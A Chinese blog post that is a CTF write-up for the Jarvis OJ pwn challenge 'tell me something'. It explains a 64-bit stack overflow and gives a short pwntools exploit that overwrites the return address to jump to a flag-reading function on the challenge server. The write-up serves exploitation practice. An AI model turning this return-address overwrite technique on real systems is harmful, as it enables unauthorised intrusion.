1. 首页
  2. 文章中心
  3. pwn

Jarvis oj tell me something writeup

195 阅读 0 评论
我是靠谱客的博主 活泼狗,这篇文章主要介绍Jarvis oj tell me something writeup,现在分享给大家,希望可以做个参考。

拿到题目前checksec下:
在这里插入图片描述
64位,开启了NX。
放到IDA里看下:
在这里插入图片描述
就单纯的栈溢出,看下调用哪些函数:
在这里插入图片描述
plt表里并没有system函数,也不知道对方使用的动态库的版本。
看到函数good_game:
在这里插入图片描述
这个函数会读取flag,那么就很显然了,将返回地址覆盖到这个函数即可。
计算下溢出点:
在这里插入图片描述
在这里插入图片描述
由于是64位的程序,不能访问大于0x00007fffffffffff的地址空间。
但是可以通过RSP查看。
exp如下:

from pwn import *

a=remote("pwn.jarvisoj.com","9876")

payload='A'*136+p64(0x0000000000400620)

a.recvuntil("n")

a.send(payload)

a.interactive()

最后

以上就是活泼狗最近收集整理的关于Jarvis oj tell me something writeup的全部内容,更多相关Jarvis内容请搜索靠谱客的其他文章。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(129)

相关文章

Pytorch 学习(7):Pytorch中的Non-linear Activations (非线性层)实现
Pytorch 学习(7):Pytorch中的Non-linear Activations (非线性层)实现
【学习笔记】Pytorch深度学习-网络层之池化层、线性层、激活函数层
【学习笔记】Pytorch深度学习-网络层之池化层、线性层、激活函数层
ACL 2022 主会长文论文分类整理
ACL 2022 主会长文论文分类整理
jarvisoj——Tell Me Something
jarvisoj——Tell Me Something
Jarvis oj tell me something writeup
Jarvis oj tell me something writeup
TELL ME MORE V10西班牙语评估
TELL ME MORE V10西班牙语评估
解决提交到github报错Please tell me who you are.和为不同的项目设置不同的名称
解决提交到github报错Please tell me who you are.和为不同的项目设置不同的名称
【Aurora】在word中插入算法伪代码、表格和公式1. 插入算法伪代码2. 插入表格3. 插入公式
【Aurora】在word中插入算法伪代码、表格和公式1. 插入算法伪代码2. 插入表格3. 插入公式

评论列表共有 0 条评论

立即
投稿
返回
顶部